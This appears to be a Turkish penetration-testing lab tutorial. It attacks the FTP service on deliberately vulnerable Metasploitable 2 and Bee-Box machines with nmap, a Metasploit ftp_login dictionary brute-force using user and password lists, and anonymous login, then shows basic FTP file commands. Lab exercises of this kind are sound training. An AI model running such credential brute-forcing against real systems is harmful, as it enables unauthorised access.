100.100.200.7 IP adresli Metaploitable 2 sunucusunda FTP servisi çalışmaktadır.
nmap -p21 100.100.200.7 -sV –open -Pn
FTP sunucusuna erişim sağlayabilecek kullanıcı hesaplarının tespiti için MSF ftp_login auxiliary modülü kullanılabilir.
search ftp_login
use auxiliary/scanner/ftp/ftp_login
show options
Hedef sunucu IP adresi ve sözlük saldırı için kullanılacak dosyalar verilerek modül başlatılabilir. Başarısız erişimlerin gösterilmemesi için “Verbose” seçeneği “false” olarak ayarlanabilir.
set RHOSTS 100.100.200.7
set USER_FILE /root/Desktop/Paylasim/Kullanicilar
set PASS_FILE /root/Desktop/Paylasim/Parolalar
run
set VERBOSE false
run
Böylece tespit edilen kullanıcı ile ftp servisine erişim sağlanabilir.
ftp -v 100.100.200.7
help
ls
Temel FTP İşlemleri
FTP servisi ile hedef sisteme girdikten sonra dosya alma veya dosya yükleme işlemleri gerçekleştirilebilir.
Not: Bu aşamada kullanılan Bee-Box sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/
FTP ile kimlik doğrulama yapılmıyorsa anonim olarak “anonymous” kullanıcı adı ile giriş yapılabilir.
ftp 192.168.133.159
anonymous
HerhangiBirŞeyYazılabilir
help
Erişim sağlandıktan sonra mevcut dizinin kontrolü için “pwd”, klasör oluşturmak için “mkdir”, mevcut dizindeki nesneleri listelemek için “ls”, bir dizinin içerisine girmek için “cd”, sunucuya dosya atmak için “put”, mevcut dosyayı silmek için “delete” kullanılabilir.
pwd
mkdir YeniKlasor
ls
cd YeniKlasor
pwd
put Kullanicilar KullaniciListesi
ls
delete KullaniciListesi
ls
Mevcutta bulunan klasörü silmek için “rmdir”, mevcutta bulunan bir dosyayı FTP sunucusundan yerel sisteme (bu örnek için Kali makinesine) almak için “get”, FTP sunucusu ile bağlantıyı kesmek için de “bye” komutları kullanılabilir.
pwd
cd ..
pwd
rmdir YeniKlasor
ls
get Terminator_Salvation.pdf Terminator.pdf
bye
ls